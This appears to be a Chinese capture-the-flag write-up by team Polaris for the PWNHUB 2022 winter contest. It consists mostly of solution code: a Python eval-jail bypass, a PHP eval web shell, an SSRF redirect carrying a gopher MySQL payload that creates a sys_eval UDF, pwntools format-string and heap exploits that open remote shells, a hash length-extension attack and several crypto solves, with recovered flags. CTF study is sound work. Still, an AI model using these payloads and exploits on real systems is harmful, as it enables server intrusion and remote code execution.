PWNHUB 2022冬季赛Polaris战队–WP

import requests
burp0_url = "http://47.97.127.1:29163/"burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://47.97.127.1:29163", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://47.97.127.1:29163/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"calc": "????(?????((47,102,108,97,103)).??????()).????()"}response = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)print(response.text)

import flaskfrom flask import Flask, request, sessionimport re
app = Flask(__name__)def waf(s):    try:        blacklist='''abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ=+_ tn\[]'"@'''        for i in blacklist:            if i in s:                return 'error'        return s    except:        return 'error'
@app.route('/', methods=['GET', 'POST'])def index():    if request.method == 'GET':        return flask.render_template('index.html')    elif request.method == 'POST':        calc = waf(request.form.get("calc"))        if calc !='error':            calc = eval(calc)        return flask.render_template('index.html',calc=calc)

if __name__ == '__main__':    app.debug = False    app.run('0.0.0.0', 80)

0000000000000000000000000000000000000000 0701f62d1c7a5a43838cdc43e7843c83dabd477d test <test@test.com> 1667454367 +0000  commit (initial): t_v10701f62d1c7a5a43838cdc43e7843c83dabd477d c9a4a016a1bd720a68f810776280619984e87e99 test <test@test.com> 1667454458 +0000  commit: t_v2c9a4a016a1bd720a68f810776280619984e87e99 c9a4a016a1bd720a68f810776280619984e87e99 Linux User <www-data@18e9413005bf.(none)> 1671275415 +0000  reset: moving to c9a4a016a1bd720a68f810776280619984e87e99

php<?php    @eval($_POST['shell']);    echo("hello");?>

php<?phpheader("location: http://127.0.0.1:80")

<?phpheader("location: gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%39%00%00%00%03%43%52%45%41%54%45%20%46%55%4e%43%54%49%4f%4e%20%73%79%73%5f%65%76%61%6c%20%52%45%54%55%52%4e%53%20%53%54%52%49%4e%47%20%53%4f%4e%41%4d%45%20%27%75%64%66%2e%73%6f%27%3b%01%00%00%00%01");// 利用 gopherus生成mysql语句，每次换一下location的值即可?>

pythoneval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41))

python#!/usr/bin/env python3import string
def main():        whiteList = string.ascii_letters + string.digits + ",!?;`#+-/$@&|~^<>(){}"        blackList = vars(__builtins__).copy()        for key in (                "getattr", "exec", "open", "__builtins__", "__build_class__", "__loader__", "__spec__"        ):blackList[key] = None        pwnhub = ''' /$$$$$$$  /$$      /$$ /$$   /$$ /$$   /$$ /$$   /$$ /$$$$$$$ | $$__  $$| $$  /$ | $$| $$$ | $$| $$  | $$| $$  | $$| $$__  $$| $$   $$| $$ /$$$| $$| $$$$| $$| $$  | $$| $$  | $$| $$   $$| $$$$$$$/| $$/$$ $$ $$| $$ $$ $$| $$$$$$$$| $$  | $$| $$$$$$$ | $$____/ | $$$$_  $$$$| $$  $$$$| $$__  $$| $$  | $$| $$__  $$| $$      | $$$/   $$$| $$  $$$| $$  | $$| $$  | $$| $$   $$| $$      | $$/     $$| $$   $$| $$  | $$|  $$$$$$/| $$$$$$$/|__/      |__/     __/|__/  __/|__/  |__/ ______/ |_______/ '''        print(pwnhub)        print("Hi, Guys! Welcome to pyjail!")        print("Are you looking for the flag?")        print("No words, Show me your Payload:)")        while True:                line = input("$ ")                if not line:                        continue                if any(keyword not in whiteList for keyword in line):                        print("Oh, You are hacker:(")                        continue                try:                        print(eval(line, blackList))                except Exception as e:                        print(e)
if __name__ == "__main__":        main()

text[手机]:2022-12-14T07:12:36.062Z, 8615545466531(58299...e18e4)2022-12-14T07:12:36.122Z, 8615545466531(58299...e18e4)2022-12-14T07:12:55.114Z,(58299...893d4)2022-12-14T07:13:03.484Z, 8618800009527(11cbd...893d4)2022-12-14T07:49:27.622Z, 8618629517089(fade7...e461b)2022-12-14T14:08:09.269Z,(58299...893d4)2022-12-14T14:08:09.312Z,(58299...893d4)2022-12-14T14:08:13.148Z,(58299...893d4)2022-12-14T14:08:59.066Z, 8615545466531(58299...e18e4)2022-12-14T14:08:59.088Z, 8615545466531(58299...e18e4)2022-12-14T14:09:01.878Z, 8615545466531(58299...e18e4)2022-12-14T14:09:23.239Z,(11cbd...e18e4)2022-12-14T14:16:06.057Z, 8615545466531(58299...e18e4)2022-12-14T14:16:12.643Z, 8618800009527(11cbd...893d4)2022-12-14T14:16:21.546Z, 8618800009527(11cbd...893d4)2022-12-14T14:33:52.073Z, 8618800009527(11cbd...893d4)2022-12-14T14:37:26.990Z, 8618800009527(11cbd...893d4)2022-12-14T14:37:53.330Z,(58299...893d4)[文件]:2022-12-15T04:22:48.706Z,IMG_8147.jpg2022-12-15T04:23:04.883Z,IMG_8147.jpg

c#include <stdio.h>#include <stdlib.h>#include <assert.h>#include <stddef.h>#include <stdint.h>#include <string.h>
#define DELTA 0x9e3779b9  #define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))  
void btea(uint32_t * v, int n, uint32_t const key[4]){  uint32_t y, z, sum;  unsigned p, rounds, e;  if (n > 1)            /* Coding Part */  {    rounds = 6 + 52 / n;    sum = 0;    z = v[n - 1];    do    {      sum += DELTA;      e = (sum >> 2) & 3;      for (p = 0; p < n - 1; p++)      {        y = v[p + 1];        z = v[p] += MX;      }      y = v[0];      z = v[n - 1] += MX;    }         while (--rounds);  }  else if (n < -1)      /* Decoding Part */  {    n = -n;    rounds = 6 + 52 / n;    sum = rounds * DELTA;    y = v[0];    do    {      e = (sum >> 2) & 3;      for (p = n - 1; p > 0; p--)      {        z = v[p - 1];        y = v[p] -= MX;      }      z = v[n - 1];      y = v[0] -= MX;      sum -= DELTA;    }         while (--rounds);  }}int main(){  for (int i = 1;; i++)  {    uint32_t  key[4] = { 's','e','a','l' };    unsigned int v2[42];    *v2 = 0xC1C33C8;    v2[1] = 0xC8AE4E2E;    v2[2] = 0x4F5B4B82;    v2[3] = 0x689738AD;    v2[4] = 0x344247A4;    v2[5] = 0xFCDB7A5E;    v2[6] = 0xA97CCB8A;    v2[7] = 0xD32040D7;    v2[8] = 0xC654F473;    v2[9] = 0xFFB9A276;    v2[10] = 2135542374;    v2[11] = 742178661;    v2[12] = 1948605882;    v2[13] = -162723804;    v2[14] = 340114920;    v2[15] = -119940220;    v2[16] = -1433261104;    v2[17] = 1682588100;    v2[18] = 868361190;    v2[19] = 790287045;    v2[20] = 665064676;    v2[21] = -1613618420;    v2[22] = -845098757;    v2[23] = -928990080;    v2[24] = -1294308575;    v2[25] = -847630224;    v2[26] = 865026984;    v2[27] = 528227606;    v2[28] = 1125283773;    v2[29] = -1191493257;    v2[30] = -2068857711;    v2[31] = 173105941;    v2[32] = -728565832;    v2[33] = -1320222442;    v2[34] = -1357083856;    v2[35] = -241099087;    v2[36] = 632837878;    v2[37] = -1673494940;    v2[38] = -1340271114;    v2[39] = 1877424045;    v2[40] = -572519049;    v2[41] = 0x4D619298;    uint32_t* temp = v2;    for (int i = 0;; i++)    {      btea(temp, -2, key);      printf("%c%c", temp[0], temp[1]);      temp += 2;    }  }}

shellprint(read('flag'))

python#!/usr/bin/python3# -*- coding:utf-8 -*-
from pwn import *import os, struct, random, time, sys, signal
class Shell():    def __init__(self):        self.clear(arch='amd64', os='linux', log_level='debug')        # self.pipe = process(['./main.py'])        self.pipe = remote('47.97.127.1', 22495)        def send(self, data:bytes, **params): return self.pipe.send(data, **params)    def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params)    def recv(self, **params): return self.pipe.recv(**params)    def close(self, **params): return self.pipe.close(**params)    def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params)    def interactive(self, **params): return self.pipe.interactive(**params)    def clear(self, **params): return context.clear(**params)
    def recvn(self, numb, **params):         result = self.pipe.recvn(numb, **params)        if(len(result) != numb):            raise EOFError('recvn')        return result
    def recvuntil(self, delims, **params):        result = self.pipe.recvuntil(delims, drop=False, **params)        if(not result.endswith(delims)):            raise EOFError('recvuntil')        return result[:-len(delims)]
    def sendafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.send(data, **params)
    def sendlineafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.sendline(data, **params)
sh = Shell()
sh.sendlineafter(b'And, what do you want to go? ', b'vulnhub')sh.sendlineafter(b'string format vuln testing: ', b'%379$#llx#%391$#llx#')stack_addr = int(sh.recvuntil(b'#'), 16)libc_addr = int(sh.recvuntil(b'#'), 16) - 0x21c87success('stack_addr: ' + hex(stack_addr))success('libc_addr: ' + hex(libc_addr))if(((stack_addr - 0x128) & 0xffff) > 0x2000):    raise EOFError
sh.sendlineafter(b'string format vuln testing: ', f'%{(stack_addr - 0xe0) & 0xffff}c%379$hn'.encode())one_gadget = libc_addr + 0x4f302byte = (one_gadget >> 0) & 0xffsh.sendlineafter(b'string format vuln testing: ', f'%{byte}c%419$hhn'.encode())
sh.sendlineafter(b'string format vuln testing: ', f'%{(stack_addr - 0xe0 + 1) & 0xff}c%379$hhn'.encode())byte = (one_gadget >> 8) & 0xffsh.sendlineafter(b'string format vuln testing: ', f'%{byte}c%419$hhn'.encode())
sh.sendlineafter(b'string format vuln testing: ', f'%{(stack_addr - 0xe0 + 2) & 0xff}c%379$hhn'.encode())byte = (one_gadget >> 16) & 0xffsh.sendlineafter(b'string format vuln testing: ', f'%{byte}c%419$hhn'.encode())
sh.sendlineafter(b'string format vuln testing: ', b'Exit')

sh.interactive()

c++    printf("Which one?n> ");    id = read_int();    if ( n < 3 ){        printf("Size: ");        size = read_int();        ptr[id] = n == 1 ? malloc(size) : ptr[id];         printf("Content: ");        read(0, ptr[id], size);    } else {        n == 3 ? free(ptr[id]) : puts(ptr[id]);    }

python#!/usr/bin/python3# -*- coding:utf-8 -*-
from pwn import *import os, struct, random, time, sys, signal
class Shell():    def __init__(self):        self.clear(arch='amd64', os='linux', log_level='debug')        # self.pipe = process(['./pwn'])        self.pipe = remote('47.97.127.1', 28353)        def send(self, data:bytes, **params): return self.pipe.send(data, **params)    def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params)    def recv(self, **params): return self.pipe.recv(**params)    def close(self, **params): return self.pipe.close(**params)    def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params)    def interactive(self, **params): return self.pipe.interactive(**params)    def clear(self, **params): return context.clear(**params)
    def recvn(self, numb, **params):         result = self.pipe.recvn(numb, **params)        if(len(result) != numb):            raise EOFError('recvn')        return result
    def recvuntil(self, delims, **params):        result = self.pipe.recvuntil(delims, drop=False, **params)        if(not result.endswith(delims)):            raise EOFError('recvuntil')        return result[:-len(delims)]
    def sendafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.send(data, **params)
    def sendlineafter(self, delim, data, **params):        self.recvuntil(delim, **params)        self.sendline(data, **params)        def add(self, index, size, content):        self.sendlineafter(b'> ', b'1')        self.sendlineafter(b'> ', str(index).encode())        self.sendlineafter(b'Size: ', str(size).encode())        self.sendafter(b'Content: ', content)        def edit(self, index, size, content):        self.sendlineafter(b'> ', b'2')        self.sendlineafter(b'> ', str(index).encode())        self.sendlineafter(b'Size: ', str(size).encode())        self.sendafter(b'Content: ', content)        def delete(self, index):        self.sendlineafter(b'> ', b'3')        self.sendlineafter(b'> ', str(index).encode())
    def show(self, index):        self.sendlineafter(b'> ', b'4')        self.sendlineafter(b'> ', str(index).encode())
sh = Shell()sh.add(0, 0x80, b'aa')
sh.edit(16, 0x10, b'a' * 0x10)sh.show(16)sh.recvuntil(b'a' * 0x10)image_addr = u64(sh.recvn(6) + b'') - 0x40c0success('image_addr: ' + hex(image_addr))
sh.edit(0, 8, p64(image_addr+0x3fe0))sh.show(0x390)libc_addr = u64(sh.recvn(6) + b'') - 0x17620success('libc_addr: ' + hex(libc_addr))
sh.edit(0, 8, p64(libc_addr+0x9ade0))sh.show(0x390)stack_addr = u64(sh.recvn(6) + b'')success('stack_addr: ' + hex(stack_addr))
sh.edit(0, 8, p64(stack_addr-0x90))
sh.edit(0x390, 0x100, flat([libc_addr + 0x1551f, libc_addr + 0x95941, libc_addr + 0x43c7c]))
sh.interactive()

pythonimport gmpy2import libnum
RSA1 = 0x97be543979cb98c109103fa118c1c930ff13a6b2562166417021afd6e46cb0837a5cc5f4094fcea5fcc33efdfa495050e0fb8269922b3ee2d403210ed1ba339af2dc3d4e8952f0c784fcc655436cf255b98cdaf8080df47f6c28bc0bae68c713c = 0x2f62fb7e7e8e27823193119f8412050ade9084ade25261a5875da23a07d5d5145e72d460697984d8aa668a25822009a4fdc85df2b208941cd3219b312f21c3c7bc4ef7aa8c18b4f91a0e815fe1892fca0f72406e571fbd0fea2c4710c601165ccd7e8a5a828721a5e2c956b732223d683d1413ef393b5f80a431c52bf9099e22b8e27daafb9d3e055242b89b5419b8925744ccf348e1bea519225af8efe7dbcc202425251039cbfe6b892a7fcf7e9d72224ea9381e3fb32ab837139af4b4112a3c7a6571c88e7d6c5db4c3f91e25edd15eb5544ef2f29a9e1bb1062ec86f1902N = 0x58a7ff25292651e1a8d82656d64fe3b458d6e688405e85aa6c02e0c33469ad3dbaef6c6eaf8faf22f2d15e80856ab7b90a40fd50c36f7b59932bc94e6fb4fabefa87b11bf4ef74df4ccf8d254f0c6812628df3c5b3786af35e3dde9c87b462d1a565af6f100750718ccb7235174947f00cec5836765150f1680d0c58a5f9ea2473a6033c218c75664dc53377dde9386f37e1a89d77e61a716129d290c5a41f81cd3490bab6fe51f232ab27cb1ac9c8eb88e908c12109a125b7439c25b6879283a17a3467823fbb089709eb836cfd03386cc4bf186eb45401472ab0bdec605fd7e = 65537S = int(gmpy2.gcd(RSA1, N))phi = S-1d = int(gmpy2.invert(e, phi))m = int(pow(c,d,S))print(libnum.n2s(m))# flag{b66f68258f184bd7afddd32c1518eed0}

python# Sageimport gmpy2, libnumimport random
a = 1755716071599N = 236038564943567983056828121309828109017x,y = 996,151729833458737979764886336489671975339PR.<b> = PolynomialRing(Zmod(N))
# y^2 = x^3 + a*x + bf = x^3+a*x+b-y^2b = int(f.roots()[0][0])e = (b<<42)+a


enc1 = 98662590652068949920571979585725979127266112216583776160769090971169664292493813021843624362593669574513220457664819153878956311077379392531742253343961645534972639309537402874636739745717765969720117162780620981639015788423324884640935466801234207019510919768602974162878323777374364290185048275714332671356enc2 = 58738699705013897273174837829098879580829898980458718341881900446701910685043213698485036350888862454440118347362218485065377354137391792039111639199258042591959084091242821874819864955504791788260187064338245516327147327866373690756260239728218244294166383516151782123688633986853602732137707507845681977204NN = 149794788177729409820185150543033616327574456754306207341321223589733698623477041345453230785413920341465642754285280273761269552897080096162195035057667200692677841848045965505750839903359478511509753781737513122660495056746669041957643882516287304836822410136985711091802722010788615177574143908444311475347
A, d1 = matrix(ZZ,[[1, enc1], [0, NN]]).LLL()[0]A, d2 = matrix(ZZ,[[1, enc2], [0, NN]]).LLL()[0]d1 = abs(d1)d2 = abs(d2)d2 = int(str(bin(d2)[2:]).zfill(512), 2)d = (d1<<512)+d2

n = 117749279680045360245987277946945707343578937283621512842997606104123872211782263906911929773756533011817679794905642225389185861207256322349591633257348367854563703050789889773031032949742664695416275919382068347995088593380486820784360816053546651916291080971628354468517506190756456913824397593128781030749
def divide_pq(e, d, n):    k = e*d - 1    while True:        g = random.randint(2, n-1)        t = k        while True:            if t % 2 != 0:                break            t //= 2            x = pow(g, t, n)            if x > 1 and gmpy2.gcd(int(x-1), int(n)) > 1:                p = gmpy2.gcd(int(x-1), int(n))                return (p, n//p)
p, q = divide_pq(e, d, n)
if p>q:    p,q = q,p    list1 = []num =1while True:    flag1 = int(p >> (512 - num))    if b'flag{' in libnum.n2s(flag1):        try:            list1.append(libnum.n2s(flag1).decode())        except:            break    num += 1flag2 = int(q>>(512-150))print(list1[-1]+libnum.n2s(flag2).decode())# flag{e89f47939d12434cb201080d8b240774}

pythonfrom pwn import *from hashpumpy import hashpump  # https://github.com/bwall/HashPumpimport base64
sh = remote('47.97.127.1', 25839)  # nc 47.97.127.1 25839sh.recvuntil(b'> ')sh.sendline(b'2')sh.recvuntil(b'Which one? ')sh.sendline(b'1')sh.recvuntil(b'Order: ')Order = sh.recvline()Order = base64.b64decode(Order)
# hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)hexdigest = Order[-64:].decode()original_data = Order[:-67].decode()data_to_add = '&p=flag'for len_sk in range(10, 21):    sh.sendline(b'3')    sh.recvuntil(b'Order: ')    key_length = len_sk + 3  # k={sk}&    new_hash, new = hashpump(hexdigest, original_data, data_to_add, key_length)    Order = new+b'&s='+new_hash.encode()    Order = base64.b64encode(Order)    sh.sendline(Order)    tmp = sh.recvline()    if b'Your current coins: 990' in tmp:        print(sh.recvline())        print(sh.recvline())        # flag{a1dc2134088618c456457dc01e51280e}        break    else:        sh.recvuntil(b'> ')

pythonimport hashlibfrom string import ascii_letters, digitsfrom itertools import producttable = ascii_letters + digitsXnum =4tail = "tFSZMu4V3cPeYvj14QiMPFpUqLb6"_hash = "cfa54fcb299c25df405223d0ec0eabeb73f91a4229e3b52b99a6ef7aac567882"for i in product(table, repeat=Xnum):    head = ''.join(i)    # print(head)    t = hashlib.sha256((tail + head).encode()).hexdigest()    if t == _hash:        print('爆破成功！结果是：', end='')        print(head)

(base) 0HB@Caliburn ~ % nc 47.97.127.1 26120sha256(tFSZMu4V3cPeYvj14QiMPFpUqLb6 + xxxx) = cfa54fcb299c25df405223d0ec0eabeb73f91a4229e3b52b99a6ef7aac567882xxxx = KiYX
         ### #### ####   ###### ####### ######          ## ## ##   ##    # ## #  ##   #  ##  ##          #    ##   ##      ##    ## #    ##  ##        ####   ##   ##      ##    ####    #####          ##    ##   ##   #  ##    ## #    ## ##          ##    ##   ##  ##  ##    ##   #  ##  ##        ####  #### ####### ####  ####### #### ## 

       1. In this challenge, you are required to classify a          bunch of e-mail texts into ham/spam categories       2. You will recive 50 samples as the training data       3. And I will give you 10 samples to validate your          trained model       4. Solve them to win the flag!
Press ENTER to continue... ################################################################################Training data 1/50: SPAM--------------------------------------------------------------------------------b"Subject: bait - excelled @ em . ca when can you startrn+ unable to see graphics ? please go here to view this email . +rnhirnbait - excelled @ em . ca ,rnyour name was given to us as someone who might be interested in gettingrnout of the rat race . are you really ?rnif so , keep reading ! being in charge of yourself and your life is the onlyrnway to go .rnthere are literally thousands of us who are making a good living at homernon the internet , and there ' s no reason why you can ' t be one of us . and i ' mrntalking about a legitimate business you can be proud of .rnjust visit our site when you have a minute ,rnand you ' ll know right away if this is what you ' ve been searching for .rnlooking forward to helping you get out of the rat race !rntake care !rnif you would prefer not to receive email advertisements from this advertiser in the future , visit us here .rn+ + + + +rnthe preceding advertisement was sent from sweepsatstake . com .rnif you would like to stop receiving advertisements from sweepsatstake . com in the future , pleasern+ + + + +rn"Press ENTER to continue... ################################################################################Training data 2/50: SPAM--------------------------------------------------------------------------------b'Subject: re : 63 % - off \ / iagra , cialis , ambien , soma and other drugs hamster disputingrncentroid terminates benzedrine boggled zebrarnvenn disengaging inferiors burdensome tortoisernconfusing congenial ires namedrnbeater absorbing boundlessnessrnbetterments popsicles david stud enlargesrnleaflets delphinus pickering participle'Press ENTER to continue... 
......
Press ENTER to continue... ################################################################################Testing data 1/10--------------------------------------------------------------------------------b"Subject: uk submission of positionsrnjust to follow up on james ' s note of yesterday - my apologies for being outrnthe elimination of the requirement to ' grab ' the fx and ir market environmentrnfrom houston ( and consequently use european data ) can improve our abilityrnto kick the overnight batch processing off earlier in the evening . james andrni will be working with brian hudson to determine the timetable for effectingrnthis changernthe revised batch start time would improve the opportunity to detect anyrnsystem failure and complete a rerun of the valuation process so as to deliverrncompleted results by the time the risk management team arrive at their desksrnin the morning . system failures are the most significant problem we face inrndelivering timely information to houston . consequently the probability ofrnmeeting current reporting deadlines would be greatly improved given that wernwill have full it overnight support covering for any it failure and curverninput validation processes on trade date .rnindeed given the successful completion of all overnight runs we are able torndeliverrnofficialisation of all valuation systems and most spreadsheets ( david hardyrnis in final testing of the eastern spreadsheet feed ) by the 10 am deadline (rnhouston 4 am )rnflash p & l by the lpm deadline ( houston 7 am )rncompletion of the final dpr to be submitted to houston by the 5 pm deadline (rnhouston 11 am )rnjames and i are currently finalising a document reviewing all possiblernchanges to business processes that could improve these times . this is inrnaddition to working with commercial and it to assess the possibility ofrndelivering significantly faster revaluation systems that could assist inrndelivering a trade date control process .rni can confirm that there is significant work to do in this area , however , wernare dedicated to meeting the objectives of improved / more real time control .rnplease feel free to call if the above requires any additional commentary .rnregardsrnmikern- - - - - - - - - - - - - - - - - - - - - - forwarded by mike jordan / lon / ect on 19 / 12 / 2000 15 : 06rn- - - - - - - - - - - - - - - - - - - - - - - - - - -rnjames newrn18 / 12 / 2000 09 : 10rnto : rick buy / hou / ect @ ectrncc : john sherriff / lon / ect @ ect , michael r brown / lon / ect @ ect , fernleyrndyson / lon / ect @ ect , mike jordan / lon / ect @ ect , ted murphy / hou / ect @ ect , garyrnhickerson / hou / ect @ ectrnsubject : uk submission of positionsrnrick ,rnthanks you for your note below . we are today implementing a flash p & lrnprocess . we aim to report daily numbers at 7 am houston time and will startrntoday with the p & l . we will build on this and hope to have draft positionsrnand var for most books within a week or so . there will be a reconciliation ofrnflash to final numbers which will be included in our return to houston .rni will put together a note on the london dpr production process which goesrninto the process we currently have , the process we actually need to have , andrnthe obstacles that are in the way . i would expect this to be finalisedrntomorrow . obtaining the usd interest rate curve on a more timely basis isrnjust one of our problems but it is unfortunately by no means our only or mostrnserious problem .rnjamesrnfrom : rick buyrn15 / 12 / 2000 21 : 59rnto : john sherriff / lon / ect @ ect , michael r brown / lon / ect @ ect , mikernjordan / lon / ect @ ectrncc : gary hickerson / hou / ect @ ect , ted murphy / hou / ect @ ectrnsubject : uk submission of positionsrnneed your help on the following : each day we are delayed in finalising var ,rnp & l and positions because the uk must wait for a usd interest rate curvesrnbefore submitting their data to houston . i am also told that it is really notrnnecessary to wait for this curve and the data could be submitted close ofrnbusiness london . even if there was some minor inaccuracy from this method itrnwould be better than what we have now . this would greatly improve thernefficiency ( by 4 to 6 hours ) in reporting to senior management . can you guysrninitiate this change or get me to the right person there . thanks , rick"The category is (H for ham/S for spam): H################################################################################Testing data 2/10--------------------------------------------------------------------------------b"Subject: fw : power generation : a regional analysis of supply and demandinrnthe us power marketrn- - - - - original message - - - - -rnfrom : stein , neil [ mailto : neil . stein @ csfb . com ]rnsent : wednesday , september 05 , 2001 6 : 49 pmrnto : undisclosed - recipientsrnsubject : fw : power generation : a regional analysis of supply andrndemandin the us power marketrn> >rn>rngood evening ,rn> attached , please find an abridged version of our 76 - page report in whichrn> we provide our supply and demand outlook for 12 regions across the us .rn>rn> summary :rn> 1 . the power markets are regional in nature the fragmented usrn> transmission system results in significant regional power pricing andrn> economic disparities . in order to fully understand this industry , macrorn> analyses of the us market must be supplemented with an in - depth assessmentrn> of its individual regions .rn> 2 . announced projects cannot be taken at face value out of the 285 , 487rn> mw of project announcements we have identified , only 26 % are actuallyrn> under construction . our base case analysis suggests that only 53 %rn> ( 149 , 944 mw ) of the announced projects will be completed .rn> 3 . shortages will persist in several key markets owing to a combinationrn> of current supply shortages , capacity retirements and demand growth , wern> estimate that the entire us will need 207 , 689 new mws by 2006 in order torn> achieve an equilibrium 18 % capacity margin . this requirement is 39 % abovern> our base case buildout forecast . consequently , we project a 2006 capacityrn> shortfall of 57 , 745 mw . our analysis indicates that supply shortages willrn> be most pronounced in the mid - atlantic , new york , parts of the midwest ,rn> and the southeast .rn> 4 . positive implications for generators our findings have positivern> implications for selected generators . we believe that calpine ( cpn ,rn> strong buy ) , entergy ( etr , buy ) , mirant ( mir , buy ) , nrg energy ( nrg , buy ) ,rn> ppl corp . ( ppl , buy ) , and reliant resources ( rri , buy ) are best positionedrn> within this market .rn>rn> regards ,rn>rn> neil stein 212 / 325 - 4217rnthis message is for the named person ' s use only . it may containrnconfidential , proprietary or legally privileged information . nornconfidentiality or privilege is waived or lost by any mistransmission .rnif you receive this message in error , please immediately delete it and allrncopies of it from your system , destroy any hard copies of it and notify thernsender . you must not , directly or indirectly , use , disclose , distribute ,rnprint , or copy any part of this message if you are not the intendedrnrecipient . credit suisse group and each of its subsidiaries each reservernthe right to monitor all e - mail communications through its networks . anyrnviews expressed in this message are those of the individual sender , exceptrnwhere the message states otherwise and the sender is authorised to staternthem to be the views of any such entity .rnunless otherwise stated , any pricing information given in this message isrnindicative only , is subject to change and does not constitute an offer torndeal at any price quoted .rnany reference to the terms of executed transactions should be treated asrnpreliminary only and subject to our formal written confirmation ."The category is (H for ham/S for spam): H################################################################################Testing data 3/10--------------------------------------------------------------------------------b"Subject: re : colarnfor who ? portland ?rnthere were none for big kids , but may have been 2 / 3 of the specilist / a & a ' s over there who got them for the last time . .rnonly other one i was aware of was laura luce in chicago which i think may have had something for state tax .rni ' ll check .rndavidrn- - - - - original message - - - - -rnfrom : kitchen , louisernsent : wednesday , march 21 , 2001 1 : 26 pmrnto : oxley , davidrnsubject : colarnwhat happened to all of the colas at the end of last year ?"The category is (H for ham/S for spam): H################################################################################Testing data 4/10--------------------------------------------------------------------------------b"Subject: re : mathworksrnmolly ,rnwe have a reasonably big room . 2 - 5 people is ok . it ' s ebl 938 .rnvincernmolly carnes @ enron communicationsrn09 / 28 / 2000 03 : 10 pmrnto : vince j kaminski / hou / ect @ ect @ enronrncc :rnsubject : re : mathworksrni ' ve got in on the calendar for the 18 th at 2 : 00 . what ' s the location ? howrnmany can we bring ? 2 or 3 ?rnthanks .rnmolly carnesrnforrnlouis casarirnvice president , mid office operationsrnenron broadband servicesrn713 - 853 - 4302 , room eb 4492rnlou _ casari @ enron . netrnvince j kaminski @ ectrn09 / 28 / 00 10 : 39 amrnto : lou casari / enron communications @ enron communications @ enronrncc : vince j kaminski / hou / ect @ ect , shirley crenshaw / hou / ect @ ect , lourncasari / enron communications @ enron communicationsrnsubject : re : mathworksrnmolly ,rni met lou in the building lobby last wednesday and he suggested that hern( or his representatives ) join the mathworks presentation to my group ) .rnit ' s a good software package for mathematical modeling ,rnbut there is a limit to the number of different installations any grouprncan productively use .rni shall take a look at some new features they offerrnand decide whether it ' s worth the effort .rnvince kaminskirnlou casari @ enron communicationsrn09 / 20 / 2000 02 : 10 pmrnsent by : molly carnes @ enron communicationsrnto : vince j kaminski / hou / ect @ ectrncc :rnsubject : mathworksrndo you know this person or this company ? they are want to set an appointmentrnwith ebs and i believe , are wanting to meet with you , also . any feedback ?rnthanks .rnmolly carnes for lou casarirnenron broadband servicesrn713 - 853 - 1467 , room eb 4486 arnmolly _ carnes @ enron . netrn- - - - - forwarded by molly carnes / enron communications on 09 / 20 / 00 02 : 09 pmrn- - - - -rnscottw @ mathworks . comrn09 / 20 / 00 08 : 46 amrnto : lou casari / enron communications @ enron communicationsrncc :rnsubject : we ' ll be in houstonrnhello mr . casari :rnmyself and our energy trading financial team will be visiting with the r & drngroup at enron the week of 10 / 16 / 00 . they have several applications can berndramatically improved with our tools .rnwe are very interested to understand the bandwidth trading market , to seernif any additional challanges can be overcome with our tools .rni would like to understand your challanges of modeling , simulating andrndeploying applications to control risk .rnare you available to discuss these items prior to our visit ?rni look forward to hearing from you .rnthanksrnscott wakefield"The category is (H for ham/S for spam): H################################################################################Testing data 5/10--------------------------------------------------------------------------------b'Subject: fw : 1999 ' s cfo excellence award winnerrn- - - - - original message - - - - -rnfrom : adams , matthewrnsent : monday , october 22 , 2001 4 : 07 pmrnto : port , david ; murphy , ted ; curry , wanda ; brackett , debbie r .rnsubject : 1999 ' s cfo excellence award winnerrninteresting reading . here ' s a quote :rnfastow ' s expert balancing act , in fact , has earned him this year ' s cfo excellence award for capital structure management . " we needed someone to rethink the entire financing structure at enron from soup to nuts , " says jeffrey k . skilling , enron president and chief operating officer . " we didn ' t want someone stuck in the past , since the industry of yesterday is no longer . andy has the intelligence and the youthful exuberance to think in new ways . he deserves every accolade tossed his way . "rn'The category is (H for ham/S for spam): H################################################################################Testing data 6/10--------------------------------------------------------------------------------b'Subject: seeking the man or woman of your dreams ?rn'The category is (H for ham/S for spam): S################################################################################Testing data 7/10--------------------------------------------------------------------------------b'Subject: re : alp presentationrndennis ,rnthanks for you message . i shall send you more information regarding therndinner later this week .rnchristie patrick , who is in charge of our university liaison unit , is 